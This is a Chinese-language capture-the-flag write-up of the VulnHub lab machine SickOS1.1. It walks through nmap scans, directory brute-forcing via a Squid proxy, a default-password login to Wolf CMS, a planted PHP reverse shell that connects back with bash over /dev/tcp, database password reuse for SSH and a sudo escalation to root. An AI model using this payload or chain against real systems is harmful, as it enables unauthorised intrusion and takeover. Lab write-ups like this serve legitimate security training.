SickOS1.1
|
647
|
0

594 字
|
18 分钟

SickOS1.1

主机发现

└─$ sudo nmap -sn 10.10.10.0/24
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-17 03:56 EDT
Nmap scan report for 10.10.10.1
Host is up (0.00016s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 10.10.10.2
Host is up (0.00010s latency).
MAC Address: 00:50:56:E3:2D:B4 (VMware)
Nmap scan report for 10.10.10.131
Host is up (0.00017s latency).
MAC Address: 00:0C:29:EF:C4:2F (VMware)
Nmap scan report for 10.10.10.254
Host is up (0.00010s latency).
MAC Address: 00:50:56:E5:45:76 (VMware)
Nmap scan report for 10.10.10.128
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 4.02 seconds

端口扫描

└─$ sudo nmap --min-rate 10000 -p- 10.10.10.131 -oA nmapscan/ports
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-17 03:58 EDT
Nmap scan report for 10.10.10.131
Host is up (0.00034s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT     STATE  SERVICE
22/tcp   open   ssh
3128/tcp open   squid-http
8080/tcp closed http-proxy
MAC Address: 00:0C:29:EF:C4:2F (VMware)

Nmap done: 1 IP address (1 host up) scanned in 13.67 seconds

TCP

└─$ sudo nmap -sT -sV -sC -O -p22,3128,8080 10.10.10.131 -oA nmapscan/detail
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-17 04:00 EDT
Nmap scan report for 10.10.10.131
Host is up (0.00043s latency).

PORT     STATE  SERVICE    VERSION
22/tcp   open   ssh        OpenSSH 5.9p1 Debian 5ubuntu1.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 09:3d:29:a0:da:48:14:c1:65:14:1e:6a:6c:37:04:09 (DSA)
|   2048 84:63:e9:a8:8e:99:33:48:db:f6:d5:81:ab:f2:08:ec (RSA)
|_  256 51:f6:eb:09:f6:b3:e6:91:ae:36:37:0c:c8:ee:34:27 (ECDSA)
3128/tcp open   http-proxy Squid http proxy 3.1.19
|_http-title: ERROR: The requested URL could not be retrieved
|_http-server-header: squid/3.1.19
8080/tcp closed http-proxy
MAC Address: 00:0C:29:EF:C4:2F (VMware)
Aggressive OS guesses: Linux 3.2 - 4.9 (95%), Linux 4.2 (92%), Linux 3.10 - 4.11 (92%), Linux 3.13 (91%), Linux 3.13 - 3.16 (91%), OpenWrt Chaos Calmer 15.05 (Linux 3.18) or Designated Driver (Linux 4.1 or 4.4) (91%), Linux 4.10 (91%), Android 5.0 - 6.0.1 (Linux 3.4) (91%), Linux 3.2 - 3.10 (91%), Linux 3.2 - 3.16 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 35.50 seconds

UDP

└─$ sudo nmap -sU -p22,3128,8080 10.10.10.131 -oA nmapscan/udp
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-17 04:03 EDT
Nmap scan report for 10.10.10.131
Host is up (0.00035s latency).

PORT     STATE         SERVICE
22/udp   open|filtered ssh
3128/udp open|filtered ndl-aas
8080/udp open|filtered http-alt
MAC Address: 00:0C:29:EF:C4:2F (VMware)

Nmap done: 1 IP address (1 host up) scanned in 1.70 seconds

Nmap漏洞扫描

└─$ sudo nmap --script=vuln -p22,3128,8080 10.10.10.131 -oA nmapscan/vuln
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-17 04:05 EDT
PORT     STATE  SERVICE
22/tcp   open   ssh
3128/tcp open   squid-http
8080/tcp closed http-proxy
MAC Address: 00:0C:29:EF:C4:2F (VMware)

Nmap done: 1 IP address (1 host up) scanned in 35.56 seconds

Squid-代理服务器

  • Squid是一个应用层的高性能代理服务器软件,主要提供缓存加速、应用层过滤控制的功能,支持HTTP、FTP、gopher、SSL和WAIS等多种协议,加快使用内部网络的访问速度的同时, 还提供丰富的访问控制、认证和日志环境, 实用方便、易掌握,是企业网络管理的常用手段。

渗透思路

目录爆破

└─$ sudo dirb http://10.10.10.131:3128/
-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Mon Jul 24 02:10:08 2023
URL_BASE: http://10.10.10.131:3128/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://10.10.10.131:3128/ ----

-----------------
END_TIME: Mon Jul 24 02:10:24 2023
DOWNLOADED: 4612 - FOUND: 0
└─$ sudo gobuster dir -u http://10.10.10.131:3128 -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.131:3128
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.5
[+] Timeout:                 10s
===============================================================
2023/07/24 02:11:45 Starting gobuster in directory enumeration mode
===============================================================

Error: the server returns a status code that matches the provided options for none existing urls. http://10.10.10.131:3128/d1a97665-637e-4b4d-b4d4-061b545acf12 => 400 (Length: 3221). To continue please exclude the status code or the length

使用代理服务器对目录进行爆破

└─$ sudo dirb http://10.10.10.131/ -p http://10.10.10.131:3128

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Mon Jul 24 02:14:55 2023
URL_BASE: http://10.10.10.131/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
PROXY: http://10.10.10.131:3128

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://10.10.10.131/ ----
+ http://10.10.10.131/cgi-bin/ (CODE:403|SIZE:288)
+ http://10.10.10.131/connect (CODE:200|SIZE:109)
+ http://10.10.10.131/index (CODE:200|SIZE:21)
+ http://10.10.10.131/index.php (CODE:200|SIZE:21)
+ http://10.10.10.131/robots (CODE:200|SIZE:45)
+ http://10.10.10.131/robots.txt (CODE:200|SIZE:45)
+ http://10.10.10.131/server-status (CODE:403|SIZE:293)

-----------------
END_TIME: Mon Jul 24 02:14:58 2023
DOWNLOADED: 4612 - FOUND: 7

登录后台

搜索得知后台登录路径为:/wolfcms/?/admin/login

弱密码admin/admin登录成功

选择在pages的Articles内写入一句话木马

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.10.128/443 0>&1'");?>
└─$ sudo nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.10.128] from (UNKNOWN) [10.10.10.131] 52870
bash: no job control in this shell
www-data@SickOs:/var/www/wolfcms$ whoami
whoami
www-data
www-data@SickOs:/var/www/wolfcms$ ls
ls
CONTRIBUTING.md
README.md
composer.json
config.php
docs
favicon.ico
index.php
public
robots.txt
wolf
www-data@SickOs:/var/www/wolfcms$
www-data@SickOs:/var/www/wolfcms$ cat config.php
cat config.php
<?php

// Database information:
// for SQLite, use sqlite:/tmp/wolf.db (SQLite 3)
// The path can only be absolute path or :memory:
// For more info look at: www.php.net/pdo

// Database settings:
define('DB_DSN', 'mysql:dbname=wolf;host=localhost;port=3306');
define('DB_USER', 'root');
define('DB_PASS', 'john@123');
define('TABLE_PREFIX', '');

// Should Wolf produce PHP error messages for debugging?
define('DEBUG', false);

// Should Wolf check for updates on Wolf itself and the installed plugins?
define('CHECK_UPDATES', true);

// The number of seconds before the check for a new Wolf version times out in case of problems.
define('CHECK_TIMEOUT', 3);

// The full URL of your Wolf CMS install
define('URL_PUBLIC', '/wolfcms/');

// Use httpS for the backend?
// Before enabling this, please make sure you have a working HTTP+SSL installation.
define('USE_HTTPS', false);

// Use HTTP ONLY setting for the Wolf CMS authentication cookie?
// This requests browsers to make the cookie only available through HTTP, so not javascript for example.
// Defaults to false for backwards compatibility.
define('COOKIE_HTTP_ONLY', false);

// The virtual directory name for your Wolf CMS administration section.
define('ADMIN_DIR', 'admin');

// Change this setting to enable mod_rewrite. Set to "true" to remove the "?" in the URL.
// To enable mod_rewrite, you must also change the name of "_.htaccess" in your
// Wolf CMS root directory to ".htaccess"
define('USE_MOD_REWRITE', false);

// Add a suffix to pages (simluating static pages '.html')
define('URL_SUFFIX', '.html');

// Set the timezone of your choice.
// Go here for more information on the available timezones:
// http://php.net/timezones
define('DEFAULT_TIMEZONE', 'Asia/Calcutta');

// Use poormans cron solution instead of real one.
// Only use if cron is truly not available, this works better in terms of timing
// if you have a lot of traffic.
define('USE_POORMANSCRON', false);

// Rough interval in seconds at which poormans cron should trigger.
// No traffic == no poormans cron run.
define('POORMANSCRON_INTERVAL', 3600);

// How long should the browser remember logged in user?
// This relates to Login screen "Remember me for xxx time" checkbox at Backend Login screen
// Default: 1800 (30 minutes)
define ('COOKIE_LIFE', 1800);  // 30 minutes

// Can registered users login to backend using their email address?
// Default: false
define ('ALLOW_LOGIN_WITH_EMAIL', false);

// Should Wolf CMS block login ability on invalid password provided?
// Default: true
define ('DELAY_ON_INVALID_LOGIN', true);

// How long should the login blockade last?
// Default: 30 seconds
define ('DELAY_ONCE_EVERY', 30); // 30 seconds

// First delay starts after Nth failed login attempt
// Default: 3
define ('DELAY_FIRST_AFTER', 3);

// Secure token expiry time (prevents CSRF attacks, etc.)
// If backend user does nothing for this time (eg. click some link)
// his token will expire with appropriate notification
// Default: 900 (15 minutes)
define ('SECURE_TOKEN_EXPIRY', 900);  // 15 minutes

获得数据库账号和密码

  • root:john@123
www-data@SickOs:/var/www/wolfcms$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
messagebus:x:102:105::/var/run/dbus:/bin/false
whoopsie:x:103:106::/nonexistent:/bin/false
landscape:x:104:109::/var/lib/landscape:/bin/false
sshd:x:105:65534::/var/run/sshd:/usr/sbin/nologin
sickos:x:1000:1000:sickos,,,:/home/sickos:/bin/bash
mysql:x:106:114:MySQL Server,,,:/nonexistent:/bin/false

尝试使用获得的账户和密码登录ssh

└─$ ssh root@10.10.10.131
The authenticity of host '10.10.10.131 (10.10.10.131)' can't be established.
ECDSA key fingerprint is SHA256:fBxcsD9oGyzCgdxtn34OtTEDXIW4E9/RlkxombNm0y8.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.131' (ECDSA) to the list of known hosts.
root@10.10.10.131's password:
Permission denied, please try again.
root@10.10.10.131's password:

┌──(kali㉿kali)-[~]
└─$ ssh sickos@10.10.10.131
sickos@10.10.10.131's password:
Permission denied, please try again.
sickos@10.10.10.131's password:
Welcome to Ubuntu 12.04.4 LTS (GNU/Linux 3.11.0-15-generic i686)

 * Documentation:  https://help.ubuntu.com/

  System information as of Mon Jul 24 12:19:35 IST 2023

  System load:  0.0               Processes:           117
  Usage of /:   4.3% of 28.42GB   Users logged in:     0
  Memory usage: 12%               IP address for eth0: 10.10.10.131
  Swap usage:   0%

  Graph this data and manage this system at:
    https://landscape.canonical.com/

124 packages can be updated.
92 updates are security updates.

New release '14.04.3 LTS' available.
Run 'do-release-upgrade' to upgrade to it.

Last login: Tue Sep 22 08:32:44 2015
sickos@SickOs:~$
  • sickos:john@123 登录成功
sickos@SickOs:~$ whoami
sickos
sickos@SickOs:~$ uname-a
uname-a: command not found
sickos@SickOs:~$ whoami
sickos
sickos@SickOs:~$ uname -a
Linux SickOs 3.11.0-15-generic #25~precise1-Ubuntu SMP Thu Jan 30 17:42:40 UTC 2014 i686 i686 i386 GNU/Linux
sickos@SickOs:~$ sudo -l
[sudo] password for sickos:
Matching Defaults entries for sickos on this host:
    env_reset, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User sickos may run the following commands on this host:
    (ALL : ALL) ALL
sickos@SickOs:~$ sudo /bin/bash
root@SickOs:~#

获得flag

root@SickOs:~# cd /root
root@SickOs:/root# ls
a0216ea4d51874464078c618298b1367.txt
root@SickOs:/root# cat a0216ea4d51874464078c618298b1367.txt
If you are viewing this!!

ROOT!

You have Succesfully completed SickOS1.1.
Thanks for Trying

root@SickOs:/root#
CMSVulnhubWeb
暂无评论

发送评论 编辑评论 



























































































|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
	




颜文字
Emoji
小恐龙
花!
	


									














上一篇
下一篇